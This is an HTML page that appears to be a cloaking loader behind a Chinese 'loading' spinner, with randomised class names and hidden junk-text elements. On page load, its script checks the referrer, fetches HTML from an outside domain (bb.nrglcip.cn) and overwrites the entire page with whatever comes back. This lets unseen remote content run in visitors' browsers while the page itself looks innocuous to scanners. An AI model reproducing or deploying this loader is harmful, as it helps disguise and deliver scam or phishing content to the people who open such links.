<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .pjdEep0gS {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .pjdEep0gS .MfKqzdgD8U {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .pjdEep0gS .content {
            line-height: 50px;
            text-align: center
        }

        .pjdEep0gS .img {
            width: 100%
        }

        .pjdEep0gS .QntU2sLG {
            text-align: center
        }

        .pjdEep0gS .QntU2sLG span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .pjdEep0gS .QntU2sLG span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .pjdEep0gS .QntU2sLG span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .pjdEep0gS .QntU2sLG span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .pjdEep0gS .QntU2sLG span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .pjdEep0gS .QntU2sLG span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .pjdEep0gS .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function OkSoFlXgn9jl(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var MXFFW = OkSoFlXgn9jl('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ MXFFW +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ MXFFW +".html?a=share";
		}
		
        yS6Fmmt5s=url+"#"+new Date().getTime();
        yS6Fmmt5s && function() {
            $.get(yS6Fmmt5s, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<b style='display:none' >EAP0GECu3i9UYlAZmov6ufwIxBPCxk7ZaFMU1XUKXekQ1siAj56xZVSEji1IgZnOQ2sx9Jz9bZeZeUuTugncb4sgp8yEUg8</b>
<h1 style='display:none' >JKcAdEmHuVdZ0Tde2ZlALTX4NWqEB7TaVrAU5zxFz1LRwEIUoJaPElWQ</h1>
<h1 style='display:none' >JKcAdEmHuVdZ0Tde2ZlALTX4NWqEB7TaVrAU5zxFz1LRwEIUoJaPElWQ</h1>
<li style='display:none' >kuT5YaFvBW8kh3dYJGkqv8p5FIeQRenMqk0Jq0941roywJ9h0Rl5LXAi</li>
<ul style='display:none' >WLctPTjIllM1ETmsrZIwHtlRciq9QPvZiwma3nTb9vlryi88raaEx0JHrgwYRRItbd4Iz5jLprRxynJYo1Oh3xOHKlMBwZ</ul>
<span style='display:none'>qC9FuhZAKYkOL8ekRA07qw7XY4xMotbnaQ3dIpGs</span><div class="pjdEep0gS">
    <div class="MfKqzdgD8U">
        <div class="QntU2sLG">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>DLVmej7zVf4GHZdac84</span>
<li style='display:none' >jzfZ80O4xKUPwiVweR</li>
<ul style='display:none' >GGsr4wrdcTLDrw5dhgJe6FgYQlu37rOEcSe27ENikycmfZO6tWEE3u</ul>
<span style='display:none'>DLVmej7zVf4GHZdac84</span></body>
</html>